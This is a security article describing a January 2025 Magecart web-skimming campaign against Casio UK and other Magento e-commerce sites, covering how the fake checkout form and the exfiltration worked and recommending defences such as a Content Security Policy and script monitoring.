Background
Web skimming, also known as “Magecart attacks,” involves injecting malicious code into e-commerce websites to steal payment card information and other sensitive data entered by customers. These attacks typically exploit vulnerabilities in the website’s software or third-party plugins to insert skimming scripts. Once the malicious script is in place, it captures the data entered by customers during the checkout process and transmits it to the attackers’ servers.
Overview of the Campaign
- Affected E-Commerce Sites: The campaign targeted multiple e-commerce websites, including the well-known brand Casio UK. The casio.co.uk website was compromised between January 14 and January 24, 2025. At least 17 other e-commerce websites were also targeted by the same campaign.
- Discovery: The campaign was discovered by Jscrambler, a security vendor specializing in client-side security. They notified Casio on January 28, 2025, about the breach.
- Response: Casio acted swiftly and removed the malicious code within 24 hours of being notified.
Attack Methodology
- Initial Infection: Attackers exploited vulnerabilities in the Magento e-commerce software used by the affected sites. This allowed them to insert the initial skimmer loader directly onto the websites’ homepages.
- Second-Stage Skimmer: The initial loader fetched a more advanced, second-stage skimmer from a server hosted in Russia. This skimmer was responsible for capturing and exfiltrating sensitive data.
Execution of the Skimming Attack
- Fake Checkout Form: Instead of targeting the legitimate checkout page, the malicious code triggered a fake payment form when users clicked the “checkout” button on the cart page. This fake form asked users to enter their personal and payment information.
- Double-Entry Skimming: Users were deceived into filling out their details twice. First, they completed a fraudulent three-step form requiring information such as email, name, address, and credit card details. After submitting this information, users were redirected to the legitimate checkout page to re-enter the same details.
- Data Exfiltration: The skimmer captured and exfiltrated the entered data to a server controlled by the attackers.
Technical Details
- Obfuscation Techniques: The second-stage skimmer payload utilized basic obfuscation techniques, including XOR-based string concealment, to hide its malicious intent.
- Data Encryption: Stolen data was encrypted using AES-256-CBC encryption with unique keys and initialization vectors (IVs) generated for each request, ensuring that the data was secure during exfiltration.
Security Recommendations
- Content Security Policy (CSP): Implementing a robust CSP can significantly reduce the risk of such attacks by controlling which scripts can be executed on the website. However, maintaining an effective CSP requires continuous monitoring and updates.
- Automated Monitoring Solutions: E-commerce platforms are advised to deploy automated script security software. Such solutions can detect and mitigate skimming infections in real-time, safeguarding both the platform and its users.
Importance of Strong Security Measures
This incident underscores the necessity of strong security measures for e-commerce platforms:
- Regular Vulnerability Assessments: Continuous monitoring and timely assessments are crucial to identify and patch vulnerabilities before they are exploited.
- Proactive Mitigation Strategies: Implementing proactive security protocols can prevent unauthorized access and mitigate potential damage from skimming attacks.
- User Education: Educating users about the risks and signs of skimming attacks can help them recognize and avoid fraudulent activities.
By understanding the background and detailed execution of such attacks, e-commerce platforms can better prepare and protect themselves against future threats.
